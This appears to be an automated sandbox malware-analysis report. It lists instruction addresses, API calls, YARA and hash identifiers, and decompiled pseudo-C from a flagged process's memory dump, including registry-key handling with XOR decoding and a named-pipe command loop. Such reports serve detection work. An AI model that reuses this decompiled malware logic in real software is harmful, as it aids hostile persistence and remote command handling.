                                                                                                                                                                                                0x00af4e2f
                                                                                                                                                                                                0x00af4e36
                                                                                                                                                                                                0x00af4e3c
                                                                                                                                                                                                0x00af4e3e
                                                                                                                                                                                                0x00af4e3f
                                                                                                                                                                                                0x00af4e43
                                                                                                                                                                                                0x00af4e4e
                                                                                                                                                                                                0x00af4e53
                                                                                                                                                                                                0x00af4e5c
                                                                                                                                                                                                0x00af4e61
                                                                                                                                                                                                0x00af4e69
                                                                                                                                                                                                0x00af4e70
                                                                                                                                                                                                0x00af4e71
                                                                                                                                                                                                0x00af4e73
                                                                                                                                                                                                0x00af4e8f
                                                                                                                                                                                                0x00af4e92
                                                                                                                                                                                                0x00af4e92
                                                                                                                                                                                                0x00af4e9b
                                                                                                                                                                                                0x00af4ea0
                                                                                                                                                                                                0x00af4eb0
                                                                                                                                                                                                0x00af4eb8
                                                                                                                                                                                                0x00af4ebd
                                                                                                                                                                                                0x00af4ec3
                                                                                                                                                                                                0x00af4ec6
                                                                                                                                                                                                0x00af4ecc
                                                                                                                                                                                                0x00af4eeb
                                                                                                                                                                                                0x00af4ef1
                                                                                                                                                                                                0x00af4ef2
                                                                                                                                                                                                0x00af4ef3
                                                                                                                                                                                                0x00af4ef4
                                                                                                                                                                                                0x00af4ef5
                                                                                                                                                                                                0x00af4ef6
                                                                                                                                                                                                0x00af4f00
                                                                                                                                                                                                0x00af4f04
                                                                                                                                                                                                0x00af4f09
                                                                                                                                                                                                0x00af4f0c
                                                                                                                                                                                                0x00af4f0e
                                                                                                                                                                                                0x00af4f20
                                                                                                                                                                                                0x00af4f20
                                                                                                                                                                                                0x00af4f22
                                                                                                                                                                                                0x00af4f2e
                                                                                                                                                                                                0x00af4f33
                                                                                                                                                                                                0x00af4f39
                                                                                                                                                                                                0x00af4f42
                                                                                                                                                                                                0x00af4f45
                                                                                                                                                                                                0x00af4f47
                                                                                                                                                                                                0x00af4f52
                                                                                                                                                                                                0x00af4f57
                                                                                                                                                                                                0x00af4f5c
                                                                                                                                                                                                0x00af4f61
                                                                                                                                                                                                0x00af4f61
                                                                                                                                                                                                0x00af4f64
                                                                                                                                                                                                0x00af4f6b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4f71
                                                                                                                                                                                                0x00af4f71
                                                                                                                                                                                                0x00af4f76
                                                                                                                                                                                                0x00af4f7a
                                                                                                                                                                                                0x00af4f7c
                                                                                                                                                                                                0x00af4f7f
                                                                                                                                                                                                0x00af4f81
                                                                                                                                                                                                0x00af4f87
                                                                                                                                                                                                0x00af4f87
                                                                                                                                                                                                0x00af4f81
                                                                                                                                                                                                0x00af4f89
                                                                                                                                                                                                0x00af4f8e
                                                                                                                                                                                                0x00af4f94
                                                                                                                                                                                                0x00af4f96
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4f9c
                                                                                                                                                                                                0x00af4f9c
                                                                                                                                                                                                0x00af4fa0
                                                                                                                                                                                                0x00af5075
                                                                                                                                                                                                0x00af507b
                                                                                                                                                                                                0x00af5081
                                                                                                                                                                                                0x00af508c
                                                                                                                                                                                                0x00af508d
                                                                                                                                                                                                0x00af508e
                                                                                                                                                                                                0x00af508f
                                                                                                                                                                                                0x00af5095
                                                                                                                                                                                                0x00af509a
                                                                                                                                                                                                0x00af50a0
                                                                                                                                                                                                0x00af50a8
                                                                                                                                                                                                0x00af50ae
                                                                                                                                                                                                0x00af50b1
                                                                                                                                                                                                0x00af50c0
                                                                                                                                                                                                0x00af50c7
                                                                                                                                                                                                0x00af50ca
                                                                                                                                                                                                0x00af50d7
                                                                                                                                                                                                0x00af50db
                                                                                                                                                                                                0x00af50e8
                                                                                                                                                                                                0x00af50ed
                                                                                                                                                                                                0x00af50f0
                                                                                                                                                                                                0x00af50f2
                                                                                                                                                                                                0x00af50fe
                                                                                                                                                                                                0x00af5103
                                                                                                                                                                                                0x00af5105
                                                                                                                                                                                                0x00af5109
                                                                                                                                                                                                0x00af510a
                                                                                                                                                                                                0x00af510c
                                                                                                                                                                                                0x00af5117
                                                                                                                                                                                                0x00af511c
                                                                                                                                                                                                0x00af5129
                                                                                                                                                                                                0x00af512d
                                                                                                                                                                                                0x00af512e
                                                                                                                                                                                                0x00af5130
                                                                                                                                                                                                0x00af5138
                                                                                                                                                                                                0x00af5139
                                                                                                                                                                                                0x00af513e
                                                                                                                                                                                                0x00af5156
                                                                                                                                                                                                0x00af515b
                                                                                                                                                                                                0x00af515e
                                                                                                                                                                                                0x00af5162
                                                                                                                                                                                                0x00af5164
                                                                                                                                                                                                0x00af5177
                                                                                                                                                                                                0x00af5181
                                                                                                                                                                                                0x00af5185
                                                                                                                                                                                                0x00af518d
                                                                                                                                                                                                0x00af518e
                                                                                                                                                                                                0x00af5196
                                                                                                                                                                                                0x00af5197
                                                                                                                                                                                                0x00af519c
                                                                                                                                                                                                0x00af51a8
                                                                                                                                                                                                0x00af51b2
                                                                                                                                                                                                0x00af51c4
                                                                                                                                                                                                0x00af51d0
                                                                                                                                                                                                0x00af51d5
                                                                                                                                                                                                0x00af51d5
                                                                                                                                                                                                0x00af51df
                                                                                                                                                                                                0x00af51e5
                                                                                                                                                                                                0x00af51e5
                                                                                                                                                                                                0x00af510c
                                                                                                                                                                                                0x00af50f2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af507b
                                                                                                                                                                                                0x00af4fa6
                                                                                                                                                                                                0x00af4fa9
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4faf
                                                                                                                                                                                                0x00af4fba
                                                                                                                                                                                                0x00af4fbb
                                                                                                                                                                                                0x00af4fbc
                                                                                                                                                                                                0x00af4fbd
                                                                                                                                                                                                0x00af4fc3
                                                                                                                                                                                                0x00af4fc8
                                                                                                                                                                                                0x00af4fdc
                                                                                                                                                                                                0x00af4fe1
                                                                                                                                                                                                0x00af4fe5
                                                                                                                                                                                                0x00af4ff0
                                                                                                                                                                                                0x00af4ff9
                                                                                                                                                                                                0x00af4ffb
                                                                                                                                                                                                0x00af4fff
                                                                                                                                                                                                0x00af5000
                                                                                                                                                                                                0x00af5002
                                                                                                                                                                                                0x00af500d
                                                                                                                                                                                                0x00af5013
                                                                                                                                                                                                0x00af5025
                                                                                                                                                                                                0x00af5028
                                                                                                                                                                                                0x00af502b
                                                                                                                                                                                                0x00af5038
                                                                                                                                                                                                0x00af5040
                                                                                                                                                                                                0x00af504a
                                                                                                                                                                                                0x00af505c
                                                                                                                                                                                                0x00af5068
                                                                                                                                                                                                0x00af506d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5002
                                                                                                                                                                                                0x00af4f96
                                                                                                                                                                                                0x00af4ece
                                                                                                                                                                                                0x00af4ece
                                                                                                                                                                                                0x00af4ed4
                                                                                                                                                                                                0x00af4ed6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ed8
                                                                                                                                                                                                0x00af4edc
                                                                                                                                                                                                0x00af51e6
                                                                                                                                                                                                0x00af51eb
                                                                                                                                                                                                0x00af51f1
                                                                                                                                                                                                0x00af51f3
                                                                                                                                                                                                0x00af51f4
                                                                                                                                                                                                0x00af51f8
                                                                                                                                                                                                0x00af5208
                                                                                                                                                                                                0x00af520d
                                                                                                                                                                                                0x00af5211
                                                                                                                                                                                                0x00af5213
                                                                                                                                                                                                0x00af5217
                                                                                                                                                                                                0x00af521c
                                                                                                                                                                                                0x00af521e
                                                                                                                                                                                                0x00af5220
                                                                                                                                                                                                0x00af5226
                                                                                                                                                                                                0x00af5226
                                                                                                                                                                                                0x00af5233
                                                                                                                                                                                                0x00af5239
                                                                                                                                                                                                0x00af523f
                                                                                                                                                                                                0x00af5244
                                                                                                                                                                                                0x00af5262
                                                                                                                                                                                                0x00af5264
                                                                                                                                                                                                0x00af5270
                                                                                                                                                                                                0x00af5270
                                                                                                                                                                                                0x00af5276
                                                                                                                                                                                                0x00af5278
                                                                                                                                                                                                0x00af527e
                                                                                                                                                                                                0x00af5290
                                                                                                                                                                                                0x00af5296
                                                                                                                                                                                                0x00af52a2
                                                                                                                                                                                                0x00af52aa
                                                                                                                                                                                                0x00af52aa
                                                                                                                                                                                                0x00af52aa
                                                                                                                                                                                                0x00af52ac
                                                                                                                                                                                                0x00af52b2
                                                                                                                                                                                                0x00af52b2
                                                                                                                                                                                                0x00af4ee2
                                                                                                                                                                                                0x00af4ee5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ee5
                                                                                                                                                                                                0x00af4ecc
                                                                                                                                                                                                0x00af4e10
                                                                                                                                                                                                0x00af4e10
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4e10
                                                                                                                                                                                                0x00af4d8e
                                                                                                                                                                                                0x00af4d95
                                                                                                                                                                                                0x00af4d9e
                                                                                                                                                                                                0x00af4da0
                                                                                                                                                                                                0x00af4da6
                                                                                                                                                                                                0x00af4db7
                                                                                                                                                                                                0x00af4dc0
                                                                                                                                                                                                0x00af4dc0
                                                                                                                                                                                                0x00af4dcc
                                                                                                                                                                                                0x00af4dd5
                                                                                                                                                                                                0x00af4dda
                                                                                                                                                                                                0x00af4ddf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ddf

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00AF4DB3
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00AF4DBA
                                                                                                                                                                                                • lstrcpynW.KERNEL32(00B1FBC8,00000105), ref: 00AF5262
                                                                                                                                                                                                • lstrcpynW.KERNEL32(00B1FDD8,00000105), ref: 00AF5276
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModulelstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3430401031-0
                                                                                                                                                                                                • Opcode ID: ab5dc4543ee3d12507d712e6472f86243a0bd927834b6c76241f75fa856933fb
                                                                                                                                                                                                • Instruction ID: dffedda82e67c3edb5b259b6fd2102c3e0fb9d93b7c0260b1de3310b905e133a
                                                                                                                                                                                                • Opcode Fuzzy Hash: ab5dc4543ee3d12507d712e6472f86243a0bd927834b6c76241f75fa856933fb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE1DD31604305AFE314EBA4DD86BBB73E9AB98310F440A29F294DB2D1DF75E944CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF9B24, Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E00AF9B24(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00AF85E5(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E00AFB638(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E00AF95A8(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0xb0e688; // 0xb20000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00AF9273(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0xb0e68c; // 0x4d3f890
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00AF9273(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0xb0e688; // 0xb20000
						_t128 =  *0xb0e68c; // 0x4d3f890
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0xb0e68c; // 0x4d3f890
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E00AF85A3( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								RegCloseKey();
								_t155[0x43] = _v8;
								_t101 = E00AFC3BB(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E00AF85FB( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E00AF85FB( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E00AF85FB( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00AF9273(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0xb0e68c; // 0x4d3f890
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0xb0e68c; // 0x4d3f890
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E00AF95C2( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E00AF92C6(_v32);
							_v32 = _t179;
							E00AF85B6( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00AF9237(_v12);
							_v24 = _t147;
							_t148 =  *0xb0e68c; // 0x4d3f890
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E00AF85FB( &_v32, 0xfffffffe);
							E00AF85FB( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00AF9273(_v12);
						_t171 =  *0xb0e684; // 0x4d3f6c8
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E00AF85FB( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}


















































                                                                                                                                                                                                0x00af9b2d
                                                                                                                                                                                                0x00af9b2f
                                                                                                                                                                                                0x00af9b32
                                                                                                                                                                                                0x00af9b34
                                                                                                                                                                                                0x00af9b3c
                                                                                                                                                                                                0x00af9b3f
                                                                                                                                                                                                0x00af9b46
                                                                                                                                                                                                0x00af9b4e
                                                                                                                                                                                                0x00af9b50
                                                                                                                                                                                                0x00af9b56
                                                                                                                                                                                                0x00af9b5f
                                                                                                                                                                                                0x00af9b67
                                                                                                                                                                                                0x00af9b6d
                                                                                                                                                                                                0x00af9b74
                                                                                                                                                                                                0x00af9b7a
                                                                                                                                                                                                0x00af9b7c
                                                                                                                                                                                                0x00af9b7f
                                                                                                                                                                                                0x00af9b81
                                                                                                                                                                                                0x00af9b81
                                                                                                                                                                                                0x00af9b81
                                                                                                                                                                                                0x00af9b89
                                                                                                                                                                                                0x00af9b8c
                                                                                                                                                                                                0x00af9b91
                                                                                                                                                                                                0x00af9b94
                                                                                                                                                                                                0x00af9b97
                                                                                                                                                                                                0x00af9b99
                                                                                                                                                                                                0x00af9ccf
                                                                                                                                                                                                0x00af9ccf
                                                                                                                                                                                                0x00af9cd5
                                                                                                                                                                                                0x00af9cdc
                                                                                                                                                                                                0x00af9d1d
                                                                                                                                                                                                0x00af9d21
                                                                                                                                                                                                0x00af9d22
                                                                                                                                                                                                0x00af9d28
                                                                                                                                                                                                0x00af9d2d
                                                                                                                                                                                                0x00af9d30
                                                                                                                                                                                                0x00af9d30
                                                                                                                                                                                                0x00af9d32
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9d32
                                                                                                                                                                                                0x00af9ce1
                                                                                                                                                                                                0x00af9ceb
                                                                                                                                                                                                0x00af9cf4
                                                                                                                                                                                                0x00af9cf9
                                                                                                                                                                                                0x00af9cfc
                                                                                                                                                                                                0x00af9cff
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9d01
                                                                                                                                                                                                0x00af9d05
                                                                                                                                                                                                0x00af9d06
                                                                                                                                                                                                0x00af9d0b
                                                                                                                                                                                                0x00af9d0c
                                                                                                                                                                                                0x00af9d0f
                                                                                                                                                                                                0x00af9d13
                                                                                                                                                                                                0x00af9d18
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9b9f
                                                                                                                                                                                                0x00af9b9f
                                                                                                                                                                                                0x00af9bac
                                                                                                                                                                                                0x00af9bb2
                                                                                                                                                                                                0x00af9bb5
                                                                                                                                                                                                0x00af9bb7
                                                                                                                                                                                                0x00af9ccc
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9ccc
                                                                                                                                                                                                0x00af9bc0
                                                                                                                                                                                                0x00af9bc4
                                                                                                                                                                                                0x00af9bcc
                                                                                                                                                                                                0x00af9bd3
                                                                                                                                                                                                0x00af9bd6
                                                                                                                                                                                                0x00af9bd9
                                                                                                                                                                                                0x00af9d35
                                                                                                                                                                                                0x00af9d38
                                                                                                                                                                                                0x00af9d50
                                                                                                                                                                                                0x00af9d53
                                                                                                                                                                                                0x00af9d55
                                                                                                                                                                                                0x00af9da9
                                                                                                                                                                                                0x00af9dac
                                                                                                                                                                                                0x00af9dae
                                                                                                                                                                                                0x00af9db0
                                                                                                                                                                                                0x00af9db0
                                                                                                                                                                                                0x00af9db6
                                                                                                                                                                                                0x00af9db9
                                                                                                                                                                                                0x00af9dbe
                                                                                                                                                                                                0x00af9dc5
                                                                                                                                                                                                0x00af9dcb
                                                                                                                                                                                                0x00af9dd0
                                                                                                                                                                                                0x00af9dd3
                                                                                                                                                                                                0x00af9dd5
                                                                                                                                                                                                0x00af9dec
                                                                                                                                                                                                0x00af9df2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9dd7
                                                                                                                                                                                                0x00af9dd7
                                                                                                                                                                                                0x00af9de3
                                                                                                                                                                                                0x00af9de7
                                                                                                                                                                                                0x00af9de8
                                                                                                                                                                                                0x00af9de8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9dd7
                                                                                                                                                                                                0x00af9d5a
                                                                                                                                                                                                0x00af9d67
                                                                                                                                                                                                0x00af9d6a
                                                                                                                                                                                                0x00af9d6c
                                                                                                                                                                                                0x00af9d9b
                                                                                                                                                                                                0x00af9d9e
                                                                                                                                                                                                0x00af9da0
                                                                                                                                                                                                0x00af9da2
                                                                                                                                                                                                0x00af9da2
                                                                                                                                                                                                0x00af9da4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9da4
                                                                                                                                                                                                0x00af9d6e
                                                                                                                                                                                                0x00af9d77
                                                                                                                                                                                                0x00af9d83
                                                                                                                                                                                                0x00af9d8e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9d93
                                                                                                                                                                                                0x00af9bdf
                                                                                                                                                                                                0x00af9be0
                                                                                                                                                                                                0x00af9be3
                                                                                                                                                                                                0x00af9be8
                                                                                                                                                                                                0x00af9bec
                                                                                                                                                                                                0x00af9bf1
                                                                                                                                                                                                0x00af9bf4
                                                                                                                                                                                                0x00af9bf7
                                                                                                                                                                                                0x00af9bf9
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9c0a
                                                                                                                                                                                                0x00af9c12
                                                                                                                                                                                                0x00af9c15
                                                                                                                                                                                                0x00af9c17
                                                                                                                                                                                                0x00af9c8c
                                                                                                                                                                                                0x00af9c94
                                                                                                                                                                                                0x00af9c19
                                                                                                                                                                                                0x00af9c1b
                                                                                                                                                                                                0x00af9c2a
                                                                                                                                                                                                0x00af9c32
                                                                                                                                                                                                0x00af9c38
                                                                                                                                                                                                0x00af9c3b
                                                                                                                                                                                                0x00af9c43
                                                                                                                                                                                                0x00af9c46
                                                                                                                                                                                                0x00af9c50
                                                                                                                                                                                                0x00af9c53
                                                                                                                                                                                                0x00af9c58
                                                                                                                                                                                                0x00af9c5b
                                                                                                                                                                                                0x00af9c5d
                                                                                                                                                                                                0x00af9c5f
                                                                                                                                                                                                0x00af9c62
                                                                                                                                                                                                0x00af9c64
                                                                                                                                                                                                0x00af9c66
                                                                                                                                                                                                0x00af9c66
                                                                                                                                                                                                0x00af9c64
                                                                                                                                                                                                0x00af9c72
                                                                                                                                                                                                0x00af9c7d
                                                                                                                                                                                                0x00af9c82
                                                                                                                                                                                                0x00af9c85
                                                                                                                                                                                                0x00af9c85
                                                                                                                                                                                                0x00af9ca4
                                                                                                                                                                                                0x00af9ca9
                                                                                                                                                                                                0x00af9caf
                                                                                                                                                                                                0x00af9cb2
                                                                                                                                                                                                0x00af9cb4
                                                                                                                                                                                                0x00af9cba
                                                                                                                                                                                                0x00af9cc3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9cc9
                                                                                                                                                                                                0x00af9b99
                                                                                                                                                                                                0x00af9b58
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: 9b8d92084b59a864b9a7ab8c402ac3481a9f90b454bb744a8fe7205a86e4b59e
                                                                                                                                                                                                • Instruction ID: d8b2d8d0df7e8efe33c1c8642fe3aa3cea4d9672a8835ec0c8e449e12c3dedd6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b8d92084b59a864b9a7ab8c402ac3481a9f90b454bb744a8fe7205a86e4b59e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F9105B190020DAFDF10DFE9DD45EEEBBB8EB58310F2005A9F614A7261DB319A01CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF3294, Relevance: 6.2, APIs: 4, Instructions: 189pipeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                			E00AF3294() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0xb0e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0xb0e684; // 0x4d3f6c8
					_push(0x80000);
					_push( *0xb0e724);
					_push( *0xb0e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0xb0e724; // 0x5090020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E00AF939F( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00AF1D89(E00AF972A( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00AF85E5(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E00AF9187( *((intOrPtr*)(_t112 + _t84 * 4)), E00AFC3BB( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00AF1D89(E00AF972A( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E00AF9498( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0xb0e724; // 0x5090020
							E00AF96AB( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E00AFC35B(_t108);
								 *0xb0e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E00AFF7E1( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E00AFF7E1( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E00AFF803( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E00AFC35B(_t109);
										} else {
											if(_t76 == 1) {
												E00AFF803( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E00AFC35B(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0xb0e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}




































                                                                                                                                                                                                0x00af329f
                                                                                                                                                                                                0x00af32a1
                                                                                                                                                                                                0x00af32a3
                                                                                                                                                                                                0x00af32a7
                                                                                                                                                                                                0x00af32aa
                                                                                                                                                                                                0x00af32b6
                                                                                                                                                                                                0x00af32c1
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af32d4
                                                                                                                                                                                                0x00af32d8
                                                                                                                                                                                                0x00af32d9
                                                                                                                                                                                                0x00af32de
                                                                                                                                                                                                0x00af32e3
                                                                                                                                                                                                0x00af32e9
                                                                                                                                                                                                0x00af32f7
                                                                                                                                                                                                0x00af349b
                                                                                                                                                                                                0x00af3307
                                                                                                                                                                                                0x00af3307
                                                                                                                                                                                                0x00af3310
